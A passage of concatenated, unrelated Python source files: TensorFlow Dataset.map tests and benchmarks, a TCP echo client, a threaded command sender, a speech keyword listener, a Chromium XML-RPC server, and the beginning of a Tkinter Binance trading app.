get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _check(_sparse(i)).eval())
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapOutOfRangeError(self):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
iterator = (
dataset_ops.Dataset.range(105)
.map(lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(100):
self.assertEqual(i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testConstantOutput(self):
iterator = (
dataset_ops.Dataset.range(10).map(lambda x: [x, "hello", 10])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, b"hello", 10), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testWarnOnLookupTable(self):
def collecting_function(x):
_ = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer([], []), 0.0, name="t1")
return x
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(collecting_function)
# NOTE(mrry): Python 3 prints other warnings in addition to the one we are
# testing, so we search for the expected warning.
self.assertGreaterEqual(len(w), 1)
found_warning = False
for warning in w:
if ("Creating lookup tables inside a function passed to Dataset.map() is "
"not supported." in str(warning)):
found_warning = True
break
self.assertTrue(found_warning)
def testNestedDatasetError(self):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
NotImplementedError, r"The Dataset.map\(\) transformation does not "
"currently support nested datasets as outputs."):
_ = dataset.map(dataset_ops.Dataset.from_tensor_slices)
def testReturnValueError(self):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
TypeError, r"Unsupported return value from function passed to "
r"Dataset.map\(\): None."):
_ = dataset.map(lambda x: None)
def testBrokenFunctionErrorOnInitialization(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])
def broken_function(_):
"""A function deliberately designed to fail on instantiation."""
value = []
tensor_value = attr_value_pb2.AttrValue()
tensor_value.tensor.CopyFrom(
tensor_util.make_tensor_proto(
value, dtype=dtypes.float32, shape=[0], verify_shape=False))
dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)
# Create a "Const" op with a `tf.float32` value and a `tf.int32` type
# attr.
const_tensor = ops.get_default_graph().create_op(
"Const", [], [dtypes.int32],
attrs={
"value": tensor_value,
"dtype": dtype_value
},
name="BrokenConst").outputs[0]
return const_tensor
dataset = dataset.map(broken_function)
iterator = dataset.make_initializable_iterator()
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.InvalidArgumentError, "BrokenConst"):
sess.run(iterator.initializer)
class MapDatasetBenchmark(test.Benchmark):
def benchmarkChainOfMaps(self):
chain_lengths = [0, 1, 2, 5, 10, 20, 50]
for chain_length in chain_lengths:
for use_inter_op_parallelism in [False, True]:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(0).repeat(None)
for _ in range(chain_length):
dataset = dataset_ops.MapDataset(
dataset,
lambda x: x,
use_inter_op_parallelism=use_inter_op_parallelism)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element.op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element.op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset chain length%s: %d Median wall time: %f" %
(" (single threaded mode)" if not use_inter_op_parallelism
else "", chain_length, median_wall_time))
self.report_benchmark(
iters=1000,
wall_time=median_wall_time,
name="benchmark_map_dataset_chain_latency_%d%s" %
(chain_length, "_single_threaded"
if not use_inter_op_parallelism else ""))
def benchmarkMapFanOut(self):
fan_outs = [1, 2, 5, 10, 20, 50, 100]
for fan_out in fan_outs:
for use_inter_op_parallelism in [False, True]:
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors(
tuple(0 for _ in range(fan_out))).repeat(None)
dataset = dataset_ops.MapDataset(
dataset,
lambda *xs: xs,
use_inter_op_parallelism=use_inter_op_parallelism)
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for _ in range(5):
sess.run(next_element[0].op)
deltas = []
for _ in range(100):
start = time.time()
for _ in range(100):
sess.run(next_element[0].op)
end = time.time()
deltas.append(end - start)
median_wall_time = np.median(deltas) / 100
print("Map dataset fan out%s: %d Median wall time: %f" %
(" (single threaded mode)" if not use_inter_op_parallelism
else "", fan_out, median_wall_time))
self.report_benchmark(
iters=1000,
wall_time=median_wall_time,
name="benchmark_map_dataset_fan_out_%d%s" %
(fan_out, "_single_threaded"
if not use_inter_op_parallelism else ""))
if __name__ == "__main__":
test.main()
|
client.py
|
import socket
import threading
import sys
import datetime
class Client:
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # make TCP connection on IPv4
port = 800
buffSize = 1024
def __init__(self, ip):
self.ip = ip
self.soc.connect((self.ip, self.port))
#sendTh = threading.Thread(target=self.sendMessage)
#sendTh.daemon = True
#sendTh.start()
while True:
data = self.soc.recv(self.buffSize)
#rcvTime = datetime.datetime.now()
if not data:
break
self.soc.send(bytes(data))
##print(datetime.datetime.strptime(data.decode('utf-8'), '%Y-%m-%d %H:%M:%S.%f'))
#print((rcvTime - datetime.datetime.strptime(data.decode('utf-8'), '%Y-%m-%d %H:%M:%S.%f')).total_seconds())
def sendMessage(self):
while True:
msg = input("")
# tes = datetime.datetime.now().time()
# print(tes)
#self.soc.send(bytes(input(""), 'utf-8'))
self.soc.send(bytes(str(datetime.datetime.now()), 'utf-8'))
#self.soc.send(bytes(str(datetime.datetime.now().time()) + " ;;" + input(""), 'utf-8'))
if(len(sys.argv) > 1):
client = Client(sys.argv[1])
else:
print("Please provide the IP of server!")
|
parallel_senders.py
|
import threading
import BB
class ParallelSender(object):
'''
Sends a command and waits for the answer in parallel to other thread's execution,
allowing other thread's to poll if the response have been received.
:param Command command: Command to be sent, must be an instance of class Command.
:param int timeout: (Default 300000) How much time (in miliseconds) to wait for response before trying again or aborting.
:param int attempts: (Default 1) How many attempts to send the command if no response is received after timeout.
If attempts is 0, it will keep trying indefinitely until StopSending is called. (Use carefully)
.. note::
Notice the command is sent when the object is created.
'''
def __init__(self, command, timeout = 300000, attempts = 1):
self.__sendingLock = threading.Lock()
self.__sending = True
self.__respLock = threading.Lock()
self.__response = None
self.__command = command
self.__attemptsLock = threading.Lock()
self.__attempts = attempts
self.__timeout = timeout/1000.0
self.__p = threading.Thread(target=self.__Execute)
self.__p.daemon = True
self.__p.start()
@property
def sending(self):
'''
A property that indicates whether the object is still waiting for a response.
'''
self.__sendingLock.acquire()
r = self.__sending
self.__sendingLock.release()
return r
def __setSending(self, s):
self.__sendingLock.acquire()
self.__sending = s
self.__sendingLock.release()
@property
def response(self):
'''
A property for retrieving the response object generated by the command.
This property should be used when *sending* is ``False``.
'''
if not self.__respLock.acquire(False):
return None
r = self.__response
self.__respLock.release()
return r
def __setResponse(self, R):
self.__respLock.acquire()
self.__response = R
self.__respLock.release()
def StopSending(self):
self.__attemptsLock.acquire()
self.__attempts = 1
self.__attemptsLock.release()
def __Execute(self):
response = None
currentAttempt = 0
self.__attemptsLock.acquire()
att = self.__attempts
self.__attemptsLock.release()
while not response and (att == 0 or currentAttempt < att):
currentAttempt += 1
response = BB.SendAndWait(self.__command, self.__timeout)
self.__attemptsLock.acquire()
att = self.__attempts
self.__attemptsLock.release()
self.__setResponse(response)
self.__setSending(False)
|
audio_listener.py
|
#!/usr/bin/env python
import mpl_toolkits # import before pathlib
import sys
import os
import pathlib
import time
import shutil
from functools import partial
from multiprocessing.dummy import Pool
import threading
from io import BytesIO
import traceback
from timeit import default_timer as timer
from typing import Union
from collections import Counter
import numpy as np
from speech_recognition import Microphone
from speech_recognition import Recognizer
from speech_recognition import AudioData
# sys.path.append(pathlib.Path(__file__).parent)
from dataset import *
import command
import noisered
SAMPLE_RATE = 16000
PHRASE_TIME_LIMIT = 2
# MODEL_WEIGHT_PATH = 'model/kmn_cnn2_lfbe.weights.best.hdf5'
MODEL_WEIGHT_PATH = 'model/kmn_cnnbidirect_lfbe.weights.best.hdf5'
THREAD_NUM = 1
# SHARED_MEM_DIR = f"/dev/shm/keyword_recognizer_{''.join(random.choices(string.ascii_uppercase + string.digits, k=10))}"
SHARED_MEM_DIR = "/var/tmp/keyword_recognizer"
INPUT_WAV = 'input.wav'
NOISERED_WAV = 'noisered.wav'
BG_WAV = 'bg_input.wav'
INPUT_WAV_PATH = os.path.join(SHARED_MEM_DIR, INPUT_WAV)
NOISERED_WAV_PATH = os.path.join(SHARED_MEM_DIR, NOISERED_WAV)
BG_WAV_PATH = os.path.join(SHARED_MEM_DIR, BG_WAV)
class ModelMap(object):
def __init__(self):
self.models = {}
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def initialize_shared_mem_dir(dir_name=SHARED_MEM_DIR):
if os.path.exists(dir_name):
eprint('temp dir already exists in shared mem.')
exit(1)
else:
os.makedirs(dir_name)
def remove_shared_mem_dir(dir_name=SHARED_MEM_DIR):
try:
shutil.rmtree(dir_name)
except OSError as e:
eprint("Error: %s - %s." % (e.filename, e.strerror))
def load_model():
# import single_word_model
# model = single_word_model.create_model_cnn2(input_shape=(Tx, n_freq), is_train=False)
import multi_words_model
model = multi_words_model.create_model_cnn_bidirect(input_shape=(Tx, n_freq), is_train=False)
model.load_weights(MODEL_WEIGHT_PATH)
model.summary()
return model
def summarize_prediction(predicted):
# decoded = np.argmax(predicted)
decoded = Counter([np.argmax(p) for p in predicted])
print(decoded)
def predict_word(audio_data: AudioData, model_map: ModelMap):
try:
if not os.path.exists(BG_WAV_PATH):
print("bg audio is not ready.")
return
try:
os.remove(INPUT_WAV_PATH)
except:
pass
# execute noise reduction
with open(INPUT_WAV_PATH + '.tmp', 'wb') as f:
f.write(audio_data.get_wav_data())
with noisered.SEMAPHORE:
try:
os.remove(INPUT_WAV_PATH)
except:
pass
os.rename(INPUT_WAV_PATH + '.tmp', INPUT_WAV_PATH)
if not noisered.create_noisered_wav(INPUT_WAV_PATH, NOISERED_WAV_PATH, BG_WAV_PATH):
return
# load or get model
if threading.get_ident() not in model_map.models:
print(f"load model. tid:{threading.get_ident()}")
model_map.models[threading.get_ident()] = load_model()
model = model_map.models[threading.get_ident()]
# create input from wav data
# io_obj = BytesIO(audio_data.get_wav_data())
# x = create_mfcc_from_io(io_obj)
x = create_features(NOISERED_WAV_PATH, FEATURE_TYPE)
# x = create_mfcc_from_file(INPUT_WAV_PATH)
# complement shortage space
print(f"x:{x.shape},{x.dtype} framedata:{len(audio_data.frame_data)}")
if x.shape[0] < Tx:
# min_val = np.amin(x, axis=0)
# print(f"min_val:{min_val.shape}")
# calc remaining space size
empty_space_size = Tx - x.shape[0]
# create remaining space
# empty_space = np.tile(min_val, (empty_space_size, 1))
empty_space = np.zeros((empty_space_size, n_freq), dtype=np.float32)
# complement data's empty space
print(f"emptysp:{empty_space.shape}")
x = np.concatenate((x, empty_space), axis=0)
# frames = np.array(data)
if x.shape[0] > Tx:
eprint(f"trim input. from={x.shape[0]} to={Tx}")
x = x[:Tx]
x = np.float32(np.array([x]))
print(f"x:{x.shape},{x.dtype}")
# do predict
start = timer()
predicted = model.predict(x)
end = timer()
print(f"predicted:{predicted} time:{end - start}")
summarize_prediction(predicted[0])
except:
traceback.print_exc()
raise
def callback(_: Recognizer, audio_data: AudioData, model_map: ModelMap, pool: Pool):
pool.apply_async(predict_word, (audio_data, model_map,))
def extract_silence(raw_data: bytearray, percentile=75) -> Union[AudioSegment, None]:
# generate the WAV file contents
wav_io = BytesIO(raw_data)
segment = AudioSegment.from_wav(wav_io)
dbfs_list = [segment[i:i + 1].dBFS for i in range(len(segment))]
smoothed_dbfs_list = np.convolve(dbfs_list, np.array([1.0/10.0 for _ in range(10)])[::-1], 'same')
std = np.std(smoothed_dbfs_list)
if std < 3.5:
# treat as silence whole time.
print("background listener: treat as silence whole range")
return segment
threshold = np.percentile(dbfs_list, percentile)
step_size = 500
extract_size = 3000
print(f"background listener: segment_size:{len(segment)} std:{np.std(smoothed_dbfs_list)} threshold:{threshold}")
for i in np.arange(0, len(segment), step_size):
if i + extract_size >= len(segment):
# silent part is not found
return None
# print(f"threadhold:{threshold} vals:{smoothed_dbfs_list[i:i+extract_size][:30]}")
if all([v < threshold for v in smoothed_dbfs_list[i:i+extract_size]]):
return segment[i:i+extract_size]
else:
# silent part is not found
return None
def listen_background():
background_listener = noisered.BackgroundListener()
with Microphone(sample_rate=SAMPLE_RATE) as source:
background_listener.adjust_for_ambient_noise(source)
while os.path.exists(SHARED_MEM_DIR):
audio_data = background_listener.listen(source, pause_time_limit=5)
if not audio_data:
print("background listener: no audio data")
time.sleep(1)
continue
segment = extract_silence(audio_data.get_wav_data())
if not segment:
print("background listener: no silence")
time.sleep(1)
continue
segment.export(BG_WAV_PATH + '.tmp', format='wav', bitrate=256)
with noisered.SEMAPHORE:
try:
os.remove(BG_WAV_PATH)
except:
pass
# create wav file
os.rename(BG_WAV_PATH + '.tmp', BG_WAV_PATH)
print(f"export bgm. {BG_WAV_PATH}. size={len(segment)}")
# with open(BG_WAV_PATH, 'wb') as f:
# f.write(audio_data.get_wav_data())
def start_listen_background():
t = threading.Thread(target=listen_background, name='listen_background')
t.start()
def main():
# start to listen background with another thread.
start_listen_background()
while not os.path.exists(BG_WAV_PATH):
print('ready for bg wav ...')
time.sleep(1)
# initialize recognizer
recognizer = Recognizer()
recognizer.speaking_duration = 0.1
recognizer.phrase_threshold = 0.1
with Microphone(sample_rate=SAMPLE_RATE) as source:
# listen for 1 second to calibrate the energy threshold for ambient noise levels
recognizer.adjust_for_ambient_noise(source)
print("Calibrated. Say something!")
source = Microphone(sample_rate=SAMPLE_RATE)
with Pool(THREAD_NUM) as pool:
callback_with_model = partial(callback, model_map=ModelMap(), pool=pool)
recognizer.listen_in_background(source, callback_with_model, PHRASE_TIME_LIMIT)
while True:
time.sleep(10)
# pool.terminate()
if __name__ == '__main__':
try:
# initialize_shared_mem_dir()
main()
finally:
pass
# remove_shared_mem_dir()
|
rpc_server.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The task RPC server code.
This server is an XML-RPC server which serves code from
rpc_methods.RPCMethods.
This server will run until shutdown is called on the server object. This can
be achieved in 2 ways:
- Calling the Quit RPC method defined in RPCMethods
- Not receiving any calls within the idle_timeout_secs time.
"""
import logging
import threading
import time
import xmlrpclib
import SimpleXMLRPCServer
import SocketServer
#pylint: disable=relative-import
import common_lib
import rpc_methods
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
"""Restricts access to only specified IP address.
This call assumes the server is RPCServer.
"""
def do_POST(self):
"""Verifies the task is authorized to perform RPCs."""
if self.client_address[0] != self.server.authorized_address:
logging.error('Received unauthorized RPC request from %s',
self.task_address[0])
self.send_response(403)
response = 'Forbidden'
self.send_header('Content-type', 'text/plain')
self.send_header('Content-length', str(len(response)))
self.end_headers()
self.wfile.write(response)
else:
return SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.do_POST(self)
class RPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer,
SocketServer.ThreadingMixIn):
"""Restricts all endpoints to only specified IP addresses."""
def __init__(self, authorized_address,
idle_timeout_secs=common_lib.DEFAULT_TIMEOUT_SECS):
SimpleXMLRPCServer.SimpleXMLRPCServer.__init__(
self, (common_lib.SERVER_ADDRESS, common_lib.SERVER_PORT),
allow_none=True, logRequests=False,
requestHandler=RequestHandler)
self.authorized_address = authorized_address
self.idle_timeout_secs = idle_timeout_secs
self.register_instance(rpc_methods.RPCMethods(self))
self._shutdown_requested_event = threading.Event()
self._rpc_received_event = threading.Event()
self._idle_thread = threading.Thread(target=self._CheckForIdleQuit)
def shutdown(self):
"""Shutdown the server.
This overloaded method sets the _shutdown_requested_event to allow the
idle timeout thread to quit.
"""
self._shutdown_requested_event.set()
SimpleXMLRPCServer.SimpleXMLRPCServer.shutdown(self)
logging.info('Server shutdown complete')
def serve_forever(self, poll_interval=0.5):
"""Serve forever.
This overloaded method starts the idle timeout thread before calling
serve_forever. This ensures the idle timer thread doesn't get started
without the server running.
Args:
poll_interval: The interval to poll for shutdown.
"""
logging.info('RPC server starting')
self._idle_thread.start()
SimpleXMLRPCServer.SimpleXMLRPCServer.serve_forever(self, poll_interval)
def _dispatch(self, method, params):
"""Dispatch the call to the correct method with the provided params.
This overloaded method adds logging to help trace connection and
call problems.
Args:
method: The method name to call.
params: A tuple of parameters to pass.
Returns:
The result of the parent class' _dispatch method.
"""
logging.debug('Calling %s%s', method, params)
self._rpc_received_event.set()
return SimpleXMLRPCServer.SimpleXMLRPCServer._dispatch(self, method, params)
def _CheckForIdleQuit(self):
"""Check for, and exit, if the server is idle for too long.
This method must be run in a separate thread to avoid a deadlock when
calling server.shutdown.
"""
timeout = time.time() + self.idle_timeout_secs
while time.time() < timeout:
if self._shutdown_requested_event.is_set():
# An external source called shutdown()
return
elif self._rpc_received_event.is_set():
logging.debug('Resetting the idle timeout')
timeout = time.time() + self.idle_timeout_secs
self._rpc_received_event.clear()
time.sleep(1)
# We timed out, kill the server
logging.warning('Shutting down the server due to the idle timeout')
self.shutdown()
|
iTrader.py
|
from tkinter import *
from tkinter import Menu
from tkinter import ttk
from tkinter.ttk import Combobox
from tkinter import messagebox
import tkinter.font as font
from binance_api import Binance
import threading
import time
import datetime
import os
import os.path
#Основные глобальные переменные
ep = False
#Состояние нажатых кнопок Button - переменные Deamon процессов
PS1 = False #Timer button_1 state (Start/Stop) true/false
PS_BU = False #Timer button_2 state (Start/Stop) true/false
PS_AB = False #Timer button_AB state (Start/Stop) true/false
PS_OT = False #Timer button_OrdTmr state (Start/Stop) true/false
Ord_Zm = False #Отображать ли Zoom график ордеров - button_Ord state (Zoom/Norm) true/false
#Состояние работы Timer - переменные Deamon процессов
should_run_T = False #Timer TICK start true/false
should_run_C = False #Timer CANDLES start true/false
should_run_S = False #Timer CANDLES SUMM start true/false
should_run_BU = False #Timer BTC/USDT watch start true/false
should_run_AB = False #Timer Account Balances watch start true/false
should_run_OT = False #Timer Order Timer start true/false
should_run_OZ = False #Timer Order Zoom start true/false
#Переменные для завршения работы с программой - все ли таймеры остановлены
TE_Tck = True
TE_Cnd = True
TE_CndSm = True
TE_BU = True
TE_AB = True
TE_Zm = True
TE_OrdTmr = True
#API Keys from Binance
API_KEY_s = ''
API_SECRET_s = ''
bot = Binance(API_KEY='', API_SECRET='')
isAcc = False
sys_msg = ''
yI=0
y0I_TP=0
yM=0
Lo=0
TT0=0
#Параметры пары для графиков
GS='CANDLE 5m'
grSmb = 'BNBUSDT' #Символ графика
Lo=0 #Номер последнего ордера
grSt = 16 #шаг цены на графике
grZm = 500 #Параметр Zoom
grOW = 1000 #Параметр для ширины свечи ордера
prSt = 0.1 #шаг цены
grH = 1 #высота графика
grW = 1 #ширина графика
grMd = 0.5 #половина высоты графика
NwOrSw=False
#Параметры рынка
MS = 'SPOT' #FUTURES or SPOT
MPS = 'USDT'
#Индивидуальные параметры пары
Lvrg = 1
Lvrg_Tmp = 1
MrgT='NONE'
MrgT_Tmp='NONE'
Isl = True
orLSS=1
#Параметры позиции (фьючерсы)
PEP = 0
PSP = 0
PPP = 0
PPP_Tmp = 0
PSP_Tmp = 0
PosSide='LONG'
#Основные глобальные переменные
#Order переменные
yI0Zm = 0 #Текущая цена для OrderZoom
#______________Таймер построения Тикового графика
class Timer_Tick:
def __init__(self):
global yI
global Lo
global TE_Tck
while True:
if PS1 == True:
sys_msg = ' Тиковый график ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = True
break
if should_run_T:
for i in range(400):
if not should_run_T:
sys_msg = ' Тиковый график ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_T:
if i==0:
sys_msg = ' Тиковый график ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = False
if i > 0:
time.sleep(0.01)
#Ссылка для просмотра в браузере: https://api.binance.com/api/v1/depth?symbol=ETHBTC
#limit - кол-во возвращаемых записей от 5 до 1000 (по умолчанию 100).
#Допустимые значения: 5, 10, 20, 50, 100, 500, 1000.
#Еще можно указать 0, но он может вернуть большое кол-во данных.
#Вес зависит от параметра limit. При лимите от 5 до 100 вес будет равен 1.
#Для параметра 500 вес составит 5. Для параметра 1000 вес будет 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#Если один купил а другой продал, то это buy или sell?
#Отвечу так: в истории торгов binance зеленым подсвечиваются сделки, у которых isBuyerMaker == false,
#и маджентой - у кого true
#sss41 = "BNBUSDT - trades"
if MS=='SPOT':
myTup12 =('trades', bot.trades(symbol=grSmb, limit=20)) #Tupl
myDicGr1 = myTup12[1][19] #dict
elif MS=='FUTURES':
myTup12 = ('FutTrades', bot.futuresTrades(symbol=grSmb, limit=20)) #tupl
myDicGr1 = myTup12[1][19] #dict
#print(myTup12[1][0])
#print(myTup12[1][19])
if i==0:
yI0=float(myDicGr1['price'])
yI=100
app.graph_1.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
#print (TT0)
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(500,grMd)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.3f" % (yI0))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.4f" % (yI0))
elif prSt < 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.8f" % (yI0))
yp=-60
ypi=-4
while yp < 1500:
points=[]
yp = 0 + ypi*60
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+ypi*15
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%M:%S")
app.graph_Tb.create_text(0 + ypi*60,10,text=tmm)
app.graph_Td.create_text(0 + ypi*60,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0-ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0-ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0-ypi*(yI0/400)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp)
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0+ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0+ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0+ypi*(yI0/400)))
ypi += 1
for mm in range(len(myTup12[1])):
myDicGr1TT = myTup12[1][mm]
if int(myDicGr1TT['id']) > Lo:
xx=myDicGr1TT['time']
xxp = 20 + ((xx - TT0)/1000)*4
yyp = grMd - ((float(myDicGr1TT['price'])-yI0)/prSt)* grSt
if xxp > 1000:
app.graph_1.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT['quoteQty']) < 100:
x1, y1 = (xxp - 1), (yyp - 1)
x2, y2 = (xxp + 1), (yyp + 1)
elif 100 <= float(myDicGr1TT['quoteQty']) <= 1000:
x1, y1 = (xxp - 2 - 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp -2 - 3*(float(myDicGr1TT['quoteQty'])/1000))
x2, y2 = (xxp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000))
elif 1000 < float(myDicGr1TT['quoteQty']) <= 10000:
x1, y1 = (xxp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000))
x2, y2 = (xxp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000))
elif 10000 < float(myDicGr1TT['quoteQty']) <= 50000:
x1, y1 = (xxp - 8), (yyp - 8)
x2, y2 = (xxp + 8), (yyp + 8)
elif float(myDicGr1TT['quoteQty']) > 50000:
x1, y1 = (xxp - 10), (yyp - 10)
x2, y2 = (xxp + 10), (yyp + 10)
if myDicGr1TT['isBuyerMaker'] == True:
flc = "magenta"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "black"
else:
flc="green"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "gold"
app.graph_1.create_oval(x1, y1, x2, y2, fill=flc)
#print(x1,x2,y1,y2)
Lo=int(myDicGr1TT['id'])
#__График ордеров в стакане (Order Book Graph)
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist5[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=grSt)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=grSt)
#______________Таймер построения Свечного графика
class Timer_Candle:
def __init__(self):
global TE_Cnd
global yI
global Lo
global PEP
global PPA
global PSP
global PPP
global y0I_TP
global GPPP_Tmp
global GPSP_Tmp
global GPPP_Tmp_txt
global GPSP_Tmp_txt
global grMd
global grSt
global grFt
global GOS_TP
global GOS_SL
grFt_12 = font.Font(size=12)
grFt_10 = font.Font(size=10)
while True:
if PS1 == True:
sys_msg = ' Свечной график ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = True
break
if should_run_C:
for i in range(400):
if not should_run_C:
sys_msg = ' Свечной график ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_C:
if i==0:
sys_msg = ' Свечной график ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
